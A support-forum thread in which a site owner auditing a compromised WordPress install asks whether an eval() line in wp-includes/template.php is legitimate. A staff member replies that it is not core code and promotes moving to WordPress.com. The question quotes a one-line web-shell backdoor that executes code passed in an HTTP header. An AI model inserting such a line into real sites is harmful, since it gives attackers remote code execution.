Suspicious eval() found in template.php – is this legitimate?

  • Unknown's avatar
    ekoagency360 · Member ·

    Hello,

    I’m currently auditing a WordPress site after a suspected security incident and I came across a line using eval() inside a template.php file. (wp-includes folder)

    The line looks conceptually like this (simplified):
    @eval($_SERVER[‘HTTP_8EBF998’]);

    From my understanding:

    • eval() is strongly discouraged in WordPress development
    • WordPress core does not use eval() in templates
    • Passing data derived from $_SERVER, headers, or request variables into eval() is typically considered remote code execution (RCE)

    I have already:

    • Replaced WordPress core files with clean originals
    • Verified plugins and themes against official sources
    • Checked server-level protections (WAF, permissions, uploads execution disabled)
    • Each time I delete the file and replace it with a clean version, the eval() line is automatically reinserted into the file within approximately 10 seconds.

    My questions are:

    1. Is there any legitimate use case where WordPress (core, themes, or reputable plugins) would intentionally place an eval() call inside a template file?
    2. Can this ever be considered safe, or should it always be treated as a compromise?
    3. If treated as malware, are there known patterns or plugins that historically injected code this way?

    I want to be absolutely sure before taking further cleanup steps.

    Any clarification from core contributors or experienced developers would be highly appreciated.

    Thank you.

    The blog I need help with is: (visible only to logged in users)

  • staff-augustuswp · Staff ·

    Hello there,

    That eval() in template.php is definitely not supposed to be there, as you can see in the core file there’s no usage of eval(): https://core.trac.wordpress.org/browser/trunk/src/wp-includes/template.php

    Since your website is not hosted on WordPress.com, where this could not have happened due to our own security measures, I recommend opening this thread on the WordPress.org forums instead: https://wordpress.org/support/forums/

    If you’re interested in keeping your clients’ sites safer, you might want to consider moving them to WordPress.com where we take care of security for you and such issues will not happen, and in the very remote case that they happen, our security team responds extremely fast patching everything in the background and cleaning up, assessing damage cause, and establishing measures to contact the affected users and future-proof the system.

    You can migrate for free here: https://wordpress.com/move/

  • The topic ‘Suspicious eval() found in template.php – is this legitimate?’ is closed to new replies.